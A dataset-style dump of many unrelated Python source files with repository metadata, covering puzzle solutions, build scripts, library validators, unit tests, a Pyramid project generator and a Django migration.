print sol3.findKthLargest(nums, 2)
|
[
"[email protected]"
] | |
cea8f85549e20e56b361532625210c10df856781
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2818/60900/249172.py
|
7ab8f518b83de81d5c00a7ebae67bc19775a6307
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 470 |
py
|
str1 = input()
str2 = input()
data1 = str1.split(" ")
chapter = str2.split(" ")
subject = (int)(data1[0])
time = (int)(data1[1])
total = 0
temp = 0
index = 0
while len(chapter)!=0:
temp = (int)(chapter[0])*time
index = 0
for i in range (0,len(chapter)):
if(temp>(int)(chapter[i])*time):
temp = (int)(chapter[i])*time
index = i
total = total+temp
del chapter[index]
if time!=1:
time = time-1
print(total)
|
[
"[email protected]"
] | |
c73ec83d2bc16f0e985a6026dd20b6c6936d08f1
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_95/2212.py
|
d949b82062698cadca5cf074e35b0245522ff71b
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 797 |
py
|
test_input1 = 'ejp mysljylc kd kxveddknmc re jsicpdrysi'
test_input2 = 'rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd'
test_input3 = 'de kr kd eoya kw aej tysr re ujdr lkgc jv'
test_output1 = 'our language is impossible to understand'
test_output2 = 'there are twenty six factorial possibilities'
test_output3 = 'so it is okay if you want to just give up'
mapping = {}
for (x, y) in zip(test_input1, test_output1):
mapping[x] = y
for (x, y) in zip(test_input2, test_output2):
mapping[x] = y
for (x, y) in zip(test_input3, test_output3):
mapping[x] = y
mapping['q'] = 'z'
mapping['z'] = 'q'
ntc = int(raw_input())
for i in xrange(0, ntc):
sentence = list(raw_input())
for j in xrange(0, len(sentence)):
sentence[j] = mapping[sentence[j]]
print 'Case #%d: %s'%(i+1, "".join(sentence))
|
[
"[email protected]"
] | |
35e250ddb36f9bda71a9edb9402cff3dc7b06ecd
|
1b9075ffea7d4b846d42981b41be44238c371202
|
/tags/2007-EOL/applications/multimedia/xsane/actions.py
|
a5dcf88f3f4b48317cf764f6179f90f66eb3cf6d
|
[] |
no_license
|
pars-linux/contrib
|
bf630d4be77f4e484b8c6c8b0698a5b34b3371f4
|
908210110796ef9461a1f9b080b6171fa022e56a
|
refs/heads/master
| 2020-05-26T20:35:58.697670 | 2011-07-11T11:16:38 | 2011-07-11T11:16:38 | 82,484,996 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,280 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
pisitools.dosed("src/xsane.h", "# include \"lcms.h\"", "# include \"lcms/lcms.h\"")
shelltools.export("CXXFLAGS", "%s -I/usr/include/lcms" % get.CXXFLAGS())
shelltools.export("LDFLAGS", "%s -L/usr/lib -llcms" % get.LDFLAGS())
autotools.configure("--enable-gtk2 \
--enable-nls \
--enable-jpeg \
--enable-png \
--enable-tiff \
--enable-gimp \
--enable-lcms \
--disable-sanetest \
--disable-gimptest \
--disable-gtktest")
def build():
autotools.make()
def install():
autotools.install()
# Make xsane symlink. Now, it is seen as a plugin in gimp.
pisitools.dosym("/usr/bin/xsane", "/usr/lib/gimp/2.0/plug-ins/xsane")
pisitools.dodoc("xsane.*")
pisitools.removeDir("/usr/sbin")
|
[
"[email protected]"
] | |
1697c0111932a0c9cad342f698ed370b0c72284d
|
a46d135ba8fd7bd40f0b7d7a96c72be446025719
|
/packages/python/plotly/plotly/validators/histogram/_outsidetextfont.py
|
91c57eed75e3073c405ed483e18e2d95722ed640
|
[
"MIT"
] |
permissive
|
hugovk/plotly.py
|
5e763fe96f225d964c4fcd1dea79dbefa50b4692
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
refs/heads/master
| 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 |
MIT
| 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null |
UTF-8
|
Python
| false | false | 1,566 |
py
|
import _plotly_utils.basevalidators
class OutsidetextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="outsidetextfont", parent_name="histogram", **kwargs
):
super(OutsidetextfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Outsidetextfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
""",
),
**kwargs
)
|
[
"[email protected]"
] | |
7a3131ae28be4405ce5a794b47ed688f2fecf0cb
|
71b11008ab0455dd9fd2c47107f8a27e08febb27
|
/04、 python编程/day06/3-code/06-函数的返回值.py
|
7adbf30fba433ca7320decfaec8f19bc9ce11693
|
[] |
no_license
|
zmh19941223/heimatest2021
|
49ce328f8ce763df0dd67ed1d26eb553fd9e7da4
|
3d2e9e3551a199bda9945df2b957a9bc70d78f64
|
refs/heads/main
| 2023-08-25T17:03:31.519976 | 2021-10-18T05:07:03 | 2021-10-18T05:07:03 | 418,348,201 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 478 |
py
|
# # 我们没有使用过函数 带返回值
# print("hello python")
# # 对于没有返回值的函数,调用方法,直接函数名(参数)
# # len是有返回值的函数
# a = len("hello python") # 会把一个值返回给调用者
# print(a)
# print(len("hello python"))
def my_sum(a, b):
return a + b # 把a + b 的结果,返回给调用者
num1 = my_sum(2, 3) # 这里就是调用my_sum函数,所以num1得到了函数的返回值
print(num1)
print(my_sum(5, 6))
|
[
"[email protected]"
] | |
98d962d303e316845b4a01a0847eb8e0c36ade3c
|
e75a40843a8738b84bd529a549c45776d09e70d9
|
/samples/openapi3/client/petstore/python/test/test_outer_enum.py
|
aa195260019e50c396a5107af8708f89aed3f908
|
[
"Apache-2.0"
] |
permissive
|
OpenAPITools/openapi-generator
|
3478dbf8e8319977269e2e84e0bf9960233146e3
|
8c2de11ac2f268836ac9bf0906b8bb6b4013c92d
|
refs/heads/master
| 2023-09-02T11:26:28.189499 | 2023-09-02T02:21:04 | 2023-09-02T02:21:04 | 133,134,007 | 17,729 | 6,577 |
Apache-2.0
| 2023-09-14T19:45:32 | 2018-05-12T09:57:56 |
Java
|
UTF-8
|
Python
| false | false | 816 |
py
|
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import petstore_api
from petstore_api.models.outer_enum import OuterEnum # noqa: E501
from petstore_api.rest import ApiException
class TestOuterEnum(unittest.TestCase):
"""OuterEnum unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testOuterEnum(self):
"""Test OuterEnum"""
inst = OuterEnum("placed")
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
6bbd7506cb05eb4e4065865fdd18cc17fcea1b2b
|
8bccc05fcb3cfc6ed93991927a514a96f53f7ec0
|
/example_extender/add_mention_dummy_extender.py
|
de5c32d684d6884597a818c80c3c1a1b17752451
|
[
"MIT"
] |
permissive
|
afcarl/QuestionAnsweringGCN
|
54101c38549405d65ef22e38fed9e5bd58122ada
|
e9c1987b40a553f0619fa796f692c8880de32846
|
refs/heads/master
| 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,615 |
py
|
import numpy as np
from example_reader.graph_reader.edge_type_utils import EdgeTypeUtils
class AddMentionDummyExtender:
relation_index = None
vertex_index = None
inner = None
def __init__(self, inner, relation_index, vertex_index):
self.inner = inner
self.relation_index = relation_index
self.vertex_index = vertex_index
self.edge_type_utils = EdgeTypeUtils()
def extend(self, example):
example = self.inner.extend(example)
if not example.has_mentions():
return example
mention_vertices = [None]*len(example.mentions)
mention_edges = [None]*len(example.mentions)
graph_vertex_count = example.count_vertices()
for i, mention in enumerate(example.mentions):
mention_vertices[i] = self.vertex_index.index("<mention_dummy>")
mention.dummy_index = graph_vertex_count + i
mention_edges[i] = [mention.dummy_index,
self.relation_index.index("<dummy_to_mention>"),
mention.entity_index]
mention_vertices = np.array(mention_vertices)
mention_vertex_types = np.array([[0, 0, 1, 0, 0, 0] for _ in mention_vertices], dtype=np.float32)
mention_edges = np.array(mention_edges)
example.graph.add_vertices(mention_vertices, mention_vertex_types)
example.graph.edge_types[self.edge_type_utils.index_of("mention_dummy")] = np.arange(len(mention_edges), dtype=np.int32) + example.graph.edges.shape[0]
example.graph.add_edges(mention_edges)
return example
|
[
"[email protected]"
] | |
b6df2c47c2e660f59205c497b027827cc1e83442
|
52e83d67c8b76f83278b61a4c0787abebfa2423c
|
/DeepLense/Shubham Jain/pipelines/beginner/features/redshifts_lens_and_source.py
|
f7fbc9325206394e42474457af943383399ac661
|
[] |
no_license
|
mlsft/gsc_tasks-
|
3935142c93cebc978ff35e3f37486438c4dceeed
|
84b62aa04f2333d26f8f95a7c0b24c3922bac647
|
refs/heads/master
| 2022-04-13T16:22:18.054908 | 2020-04-14T11:59:45 | 2020-04-14T11:59:45 | 249,394,940 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,271 |
py
|
import autofit as af
import autolens as al
### PIPELINE DESCRIPTION ###
# In this pipeline, we'll demonstrate passing redshifts to a pipeline - which means that the results and images of this
# pipeline will be returned in physical unit_label (e.g. lengths in kpcs as well as arcsec, luminosities in magnitudes,
# masses in solMass, etc).
# The redshift of the lens and source are input parameters of all pipelines, and they take default values of 0.5 and
# 1.0. Thus, *all* pipelines will return physical values assuming these fiducial values if no other values are
# specified. Care must be taken interpreting the distances and masses if these redshifts are not correct or if the
# true redshifts of the lens and / or source galaxies are unknown.
# We'll perform a basic analysis which fits a lensed source galaxy using a parametric light profile where
# the lens's light is omitted. This pipeline uses two phases:
# Phase 1:
# Description: Fit the lens mass model and source light profile using x1 source.
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: None
# Notes: Inputs the pipeline default redshifts where the lens has redshift 0.5, source 1.0.
# Phase 1:
# Description: Fit the lens and source model again..
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: Lens mass (model -> phase 1), source light (model -> phase 1)
# Notes: Manually over-rides the lens redshift to 1.0 and source redshift to 2.0, to illustrate the different results.
def make_pipeline(phase_folders=None, redshift_lens=0.5, redshift_source=1.0):
### SETUP PIPELINE & PHASE NAMES, TAGS AND PATHS ###
# We setup the pipeline name using the tagging module. In this case, the pipeline name is not given a tag and
# will be the string specified below. However, its good practise to use the 'tag.' function below, incase
# a pipeline does use customized tag names.
pipeline_name = "pipeline__feature"
pipeline_tag = "redshifts"
# Unlike other features, the redshifts of the lens and source do not change the setup tag and phase path. Thus,
# our output will simply go to the phase path:
# phase_path = 'phase_name/setup'
# This function uses the phase folders and pipeline name to set up the output directory structure,
# e.g. 'autolens_workspace/output/pipeline_name/pipeline_tag/phase_name/phase_tag//'
phase_folders.append(pipeline_name)
phase_folders.append(pipeline_tag)
### PHASE 1 ###
# In phase 1, we fit the lens galaxy's mass and one source galaxy, where we:
# 1) Use the input value of redshifts from the pipeline.
mass = af.PriorModel(al.mp.EllipticalIsothermal)
mass.centre_0 = af.GaussianPrior(mean=0.0, sigma=0.1)
mass.centre_1 = af.GaussianPrior(mean=0.0, sigma=0.1)
phase1 = al.PhaseImaging(
phase_name="phase_1__x1_source",
phase_folders=phase_folders,
galaxies=dict(
lens=al.GalaxyModel(
redshift=redshift_lens, mass=mass, shear=al.mp.ExternalShear
),
source_0=al.GalaxyModel(
redshift=redshift_source, sersic=al.lp.EllipticalSersic
),
),
)
phase1.optimizer.const_efficiency_mode = True
phase1.optimizer.n_live_points = 80
phase1.optimizer.sampling_efficiency = 0.2
### PHASE 2 ###
# In phase 2, we fit the lens galaxy's mass and two source galaxies, where we:
# 1) Use manually specified new values of redshifts for the lens and source galaxies.
phase2 = al.PhaseImaging(
phase_name="phase_2__x2_source",
phase_folders=phase_folders,
galaxies=dict(
lens=al.GalaxyModel(
redshift=1.0,
mass=phase1.result.model.galaxies.lens.mass,
shear=phase1.result.model.galaxies.lens.shear,
),
source=al.GalaxyModel(
redshift=2.0, sersic=phase1.result.model.galaxies.source.sersic
),
),
)
phase2.optimizer.const_efficiency_mode = True
phase2.optimizer.n_live_points = 50
phase2.optimizer.sampling_efficiency = 0.3
return al.PipelineDataset(pipeline_name, phase1, phase2)
|
[
"[email protected]"
] | |
4856bde0b0b864ee66218ab2cf5abb1934f118c2
|
27bdcba25df8b2416783d8a1229bfce08dc77189
|
/tests/util/httpretty/test_decorator.py
|
d2ccd74525dfd97109047417dea28c64ee280b8a
|
[
"Apache-2.0"
] |
permissive
|
BenjamenMeyer/stackInABox
|
5fbeab6aac38c52d5360f9dbabb9101447e32eb5
|
15586e61a2013b6f4997c652e8412a1784f8fc93
|
refs/heads/master
| 2022-04-01T01:04:33.103603 | 2021-01-09T05:52:55 | 2021-01-09T05:52:55 | 30,074,880 | 5 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,522 |
py
|
"""
Stack-In-A-Box: Basic Test
"""
import collections
import sys
import types
import unittest
import requests
from stackinabox.util.httpretty import decorator
from tests.util import base
from tests.utils.services import AdvancedService
from tests.utils.hello import HelloService
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorErrors(base.UtilTestCase):
def test_basic(self):
decor_instance = decorator.activate('localhost')
with self.assertRaises(TypeError):
decor_instance.process_service({}, raise_on_type=True)
@decorator.stack_activate('localhost', HelloService())
def test_deprecated(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecorator(base.UtilTestCase):
@decorator.activate('localhost', HelloService())
def test_basic(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@decorator.activate('localhost', HelloService(),
200, value='Hello')
def test_basic_with_parameters(self, response_code, value='alpha'):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
@decorator.activate('localhost', HelloService(),
200, value='Hello',
access_services="stack")
def test_basic_with_stack_acccess(self, response_code, value='alpha',
stack=None):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
self.assertEqual(len(stack), 1)
self.assertTrue(self.hello_service.name in stack)
self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyAdvancedWithDecorator(base.UtilTestCase):
@decorator.activate('localhost', AdvancedService())
def test_basic(self):
res = requests.get('http://localhost/advanced/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
res = requests.get('http://localhost/advanced/h')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Good-Bye')
expected_result = {
'bob': 'bob: Good-Bye alice',
'alice': 'alice: Good-Bye bob',
'joe': 'joe: Good-Bye jane'
}
res = requests.get('http://localhost/advanced/g?bob=alice;'
'alice=bob&joe=jane')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.json(), expected_result)
res = requests.get('http://localhost/advanced/1234567890')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'okay')
res = requests.get('http://localhost/advanced/_234567890')
self.assertEqual(res.status_code, 595)
res = requests.put('http://localhost/advanced/h')
self.assertEqual(res.status_code, 405)
res = requests.put('http://localhost/advanced2/i')
self.assertEqual(res.status_code, 597)
def httpretty_generator():
yield HelloService()
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndGenerator(base.UtilTestCase):
def test_verify_generator(self):
self.assertIsInstance(httpretty_generator(), types.GeneratorType)
@decorator.activate(
'localhost',
httpretty_generator()
)
def test_basic(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@decorator.activate(
'localhost',
httpretty_generator(),
200, value='Hello'
)
def test_basic_with_parameters(self, response_code, value='alpha'):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
@decorator.activate(
'localhost',
httpretty_generator(),
200, value='Hello',
access_services="stack"
)
def test_basic_with_stack_acccess(self, response_code, value='alpha',
stack=None):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
self.assertEqual(len(stack), 1)
self.assertTrue(self.hello_service.name in stack)
self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
def httpretty_list():
return [
HelloService()
]
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndList(base.UtilTestCase):
def test_verify_list(self):
self.assertIsInstance(httpretty_list(), collections.Iterable)
@decorator.activate(
'localhost',
httpretty_list()
)
def test_basic(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@decorator.activate(
'localhost',
httpretty_list(),
200, value='Hello'
)
def test_basic_with_parameters(self, response_code, value='alpha'):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
@decorator.activate(
'localhost',
httpretty_list(),
200, value='Hello',
access_services="stack"
)
def test_basic_with_stack_acccess(self, response_code, value='alpha',
stack=None):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
self.assertEqual(len(stack), 1)
self.assertTrue(self.hello_service.name in stack)
self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
|
[
"[email protected]"
] | |
8746be1fd3b410f5feea5dc25408026a13c2840a
|
b5445f9a1f3597472f47df89696465bca7735406
|
/app/program.py
|
fbad7d4d00617fce1af32fa10d72252d695d045e
|
[
"MIT"
] |
permissive
|
mikeckennedy/pyramid-web-builder-python-gui
|
8af5a4dde9ff1bd6173f789464b67bdaba8bd3fa
|
d842e116730e9b0ed9daaf1125e1fb6e2b3ea40e
|
refs/heads/master
| 2021-05-03T11:00:32.390158 | 2018-02-17T16:12:56 | 2018-02-17T16:12:56 | 120,542,873 | 6 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,867 |
py
|
import cookiecutter.main
import sys
from gooey import Gooey, GooeyParser
from utils import to_project_style
@Gooey(
program_name='Pyramid app builder',
program_description='Create a Pyramid web app',
show_success_modal=False,
requires_shell=False)
def main():
info = get_user_values()
proj_dir = build_app(info)
print("Project created: {}".format(proj_dir))
def get_user_values():
parser = GooeyParser()
parser.add_argument(dest='template',
metavar='Project type',
help="Type of Pyramid project",
choices=['Starter', "Talk Python Entrepreneur's", 'SQLAlchemy', 'SubstanceD', 'ZODB'])
parser.add_argument('project_name',
metavar='Project name',
help="The user-visible name of your project")
parser.add_argument(
dest='template_language',
metavar='Template language',
widget='Dropdown',
choices=["jinja2", "chameleon", "mako"]
)
parser.add_argument(
dest="working_dir",
metavar='Output directory',
help='Directory for project',
widget="DirChooser")
sysargs = sys.argv[1:]
args = parser.parse_args(sysargs)
return args
def template_to_url(template_name: str) -> str:
if template_name == 'Starter':
return 'https://github.com/Pylons/pyramid-cookiecutter-starter'
elif template_name == 'SQLAlchemy':
return 'https://github.com/Pylons/pyramid-cookiecutter-alchemy'
elif template_name == 'SubstanceD':
return 'https://github.com/Pylons/substanced-cookiecutter'
elif template_name == "Talk Python Entrepreneur's":
return 'https://github.com/mikeckennedy/cookiecutter-pyramid-talk-python-starter'
else:
raise Exception("Unknown template type")
def build_app(info):
template = template_to_url(info.template)
proj_dir = cookiecutter.main.cookiecutter(
template,
no_input=True,
output_dir=info.working_dir,
extra_context={
'project_name': info.project_name,
'repo_name': to_project_style(info.project_name),
'template_language': info.template_language,
"project_slug": to_project_style(info.project_name),
"contact_name": "Company Name",
"domain_name": "yourcompany.com",
"contact_email": "[email protected]",
"description": "",
"integrations": "",
"mailchimp_api": "",
"mailchimp_list_id": "",
"outbound_smtp_username": "",
"outbound_smtp_password": "",
"outbound_smtp_server": "",
"outbound_smtp_port": "587",
"rollbar_access_token": ""
}
)
return proj_dir
if __name__ == '__main__':
sys.exit(main())
|
[
"[email protected]"
] | |
411345c0f65612ba6ffbc7676affbf602610f570
|
b639cc785f3e548c77090fb8d2bc35d5aebfa27c
|
/tests/test_patterns/test_des.py
|
79d37243bb32adcaed183884512f9af4dcd4d33f
|
[] |
no_license
|
jmcarp/neurotrends
|
92b7c33a0fe7a216af4cbbb5d4d26f8ee051286e
|
724c06f6a31ecfe37780b51038b3367cd501be37
|
refs/heads/master
| 2016-09-05T15:49:35.435697 | 2014-11-02T04:27:21 | 2014-11-02T04:27:21 | 6,889,235 | 6 | 3 | null | 2014-10-19T18:33:44 | 2012-11-27T19:15:19 |
Python
|
UTF-8
|
Python
| false | false | 433 |
py
|
# -*- coding: utf-8 -*-
import pytest
from neurotrends.pattern import des
from . import check_taggers
@pytest.mark.parametrize('input, expected', [
# Positives
('block design', {}),
('blocked paradigm', {}),
('epoch based', {}),
('epoched analysis', {}),
# PMID 21625502
('we used a blocked factorial design', {}),
])
def test_block(input, expected):
check_taggers([des.block], input, expected)
|
[
"[email protected]"
] | |
50ed4c1e4c8f3a3d0004a7364916f829ebeb823e
|
e831c22c8834030c22c54b63034e655e395d4efe
|
/171-ExcelSheetColumnNumber.py
|
b0ecffe70dcf519041cda5b5ec7b971faf11ca34
|
[] |
no_license
|
szhmery/leetcode
|
a5eb1a393422b21f9fd4304b3bdc4a9db557858c
|
9fcd1ec0686db45d24e2c52a7987d58c6ef545a0
|
refs/heads/master
| 2023-08-16T00:27:56.866626 | 2021-10-23T07:35:37 | 2021-10-23T07:35:37 | 331,875,151 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 394 |
py
|
class Solution:
def titleToNumber(self, columnTitle: str) -> int:
ans = 0
for char in columnTitle:
num = ord(char) - ord('A') + 1
ans = ans * 26 + num
return ans
if __name__ == '__main__':
solution = Solution()
result = solution.titleToNumber("FXSHRXW")
print(result)
result = solution.titleToNumber("ZY")
print(result)
|
[
"[email protected]"
] | |
f4b2a1dbd9240673bd7048d07490b2712b5479ef
|
4578b30c433510cf370d51475ec11cac9c3de1cb
|
/serpent/analytics_client.py
|
f7cc26e803be8a25bf0c6da550b983ec00c7ca18
|
[
"MIT"
] |
permissive
|
SerpentAI/SerpentAI
|
0a5b2d567b50388722c3a3c5152555ce94256c49
|
00a487dd088c6ca2528d025f3273c0a796efe210
|
refs/heads/dev
| 2023-03-08T14:14:07.171435 | 2020-05-22T22:34:09 | 2020-05-22T22:34:09 | 88,444,621 | 7,216 | 950 |
MIT
| 2020-07-15T00:41:35 | 2017-04-16T21:48:39 |
Python
|
UTF-8
|
Python
| false | false | 1,395 |
py
|
from redis import StrictRedis
from datetime import datetime
from pprint import pprint
from serpent.config import config
import json
class AnalyticsClientError(BaseException):
pass
class AnalyticsClient:
def __init__(self, project_key=None):
if project_key is None:
raise AnalyticsClientError("'project_key' kwarg is expected...")
self.project_key = project_key
self.redis_client = StrictRedis(**config["redis"])
self.broadcast = config["analytics"].get("broadcast", False)
self.debug = config["analytics"].get("debug", False)
self.event_whitelist = config["analytics"].get("event_whitelist")
@property
def redis_key(self):
return f"SERPENT:{self.project_key}:EVENTS"
def track(self, event_key=None, data=None, timestamp=None, is_persistable=True):
if self.event_whitelist is None or event_key in self.event_whitelist:
event = {
"project_key": self.project_key,
"event_key": event_key,
"data": data,
"timestamp": timestamp if timestamp is not None else datetime.utcnow().isoformat(),
"is_persistable": is_persistable
}
if self.debug:
pprint(event)
if self.broadcast:
self.redis_client.lpush(self.redis_key, json.dumps(event))
|
[
"[email protected]"
] | |
cdc62e0661ae30c80e83b7d35e680840195d3461
|
2929a5acbe52994cf2f961ed120374b7b330d074
|
/form5/migrations/0008_auto_20200724_1433.py
|
30b1610c3e20398521e7651d662281109a24371c
|
[] |
no_license
|
orhunakar01/larasolar01
|
a52135747676c587f6dfd98c67bf4c4a323dc448
|
18e12ecd5adc086da56b956a7f8da33f0723c84a
|
refs/heads/master
| 2022-12-04T16:06:32.983099 | 2020-08-26T06:45:03 | 2020-08-26T06:45:03 | 290,418,075 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 434 |
py
|
# Generated by Django 3.0.8 on 2020-07-24 11:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('form5', '0007_auto_20200724_1430'),
]
operations = [
migrations.AlterField(
model_name='form5',
name='dosya',
field=models.FileField(db_index=True, upload_to='', verbose_name='Fatura PDF Ekleyiniz.'),
),
]
|
[
"[email protected]"
] | |
e8bd886a3bdc6cc1e1d74870cc517a83b8118279
|
51885da54b320351bfea42c7dd629f41985454cd
|
/abc198/e.py
|
4bad4cd9760be8cf70992b7142d358622bb251b8
|
[] |
no_license
|
mskt4440/AtCoder
|
dd266247205faeda468f911bff279a792eef5113
|
f22702e3932e129a13f0683e91e5cc1a0a99c8d5
|
refs/heads/master
| 2021-12-15T10:21:31.036601 | 2021-12-14T08:19:11 | 2021-12-14T08:19:11 | 185,161,276 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,109 |
py
|
#
# abc198 e
#
import sys
from io import StringIO
import unittest
from collections import deque
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_入力例_1(self):
input = """6
2 7 1 8 2 8
1 2
3 6
3 2
4 3
2 5"""
output = """1
2
3
4
6"""
self.assertIO(input, output)
def test_入力例_2(self):
input = """10
3 1 4 1 5 9 2 6 5 3
1 2
2 3
3 4
4 5
5 6
6 7
7 8
8 9
9 10"""
output = """1
2
3
5
6
7
8"""
self.assertIO(input, output)
def resolve():
N = int(input())
C = list(map(int, input().split()))
AB = [list(map(int, input().split())) for _ in range(N-1)]
G = [[]*N for _ in range(N)]
for a, b in AB:
G[a-1].append(b-1)
G[b-1].append(a-1)
if __name__ == "__main__":
# unittest.main()
# resolve()
|
[
"[email protected]"
] | |
eed9894019e05eca7b30267d37c17455147ae279
|
52a3beeb07ad326115084a47a9e698efbaec054b
|
/horizon/.venv/lib/python2.7/site-packages/muranodashboard_org/api/packages.py
|
30555b0805e18d567b9299fc0c686cec216987c7
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/sample_scripts
|
3dade0710ecdc8f9251dc60164747830f8de6877
|
f9edce63c0a4d636f672702153662bd77bfd400d
|
refs/heads/master
| 2022-11-17T19:19:34.210886 | 2018-06-11T04:14:27 | 2018-06-11T04:14:27 | 282,088,840 | 0 | 0 | null | 2020-07-24T00:57:31 | 2020-07-24T00:57:31 | null |
UTF-8
|
Python
| false | false | 3,859 |
py
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from django.conf import settings
import yaml
from muranodashboard import api
from muranodashboard.common import cache
from muranodashboard.dynamic_ui import yaql_expression
def package_list(request, marker=None, filters=None, paginate=False,
page_size=20, sort_dir=None, limit=None):
limit = limit or getattr(settings, 'PACKAGES_LIMIT', 100)
filters = filters or {}
if paginate:
request_size = page_size + 1
else:
request_size = limit
if marker:
filters['marker'] = marker
if sort_dir:
filters['sort_dir'] = sort_dir
client = api.muranoclient(request)
packages_iter = client.packages.filter(limit=request_size,
**filters)
has_more_data = False
if paginate:
packages = list(itertools.islice(packages_iter, request_size))
if len(packages) > page_size:
packages.pop()
has_more_data = True
else:
packages = list(packages_iter)
return packages, has_more_data
def apps_that_inherit(request, fqn):
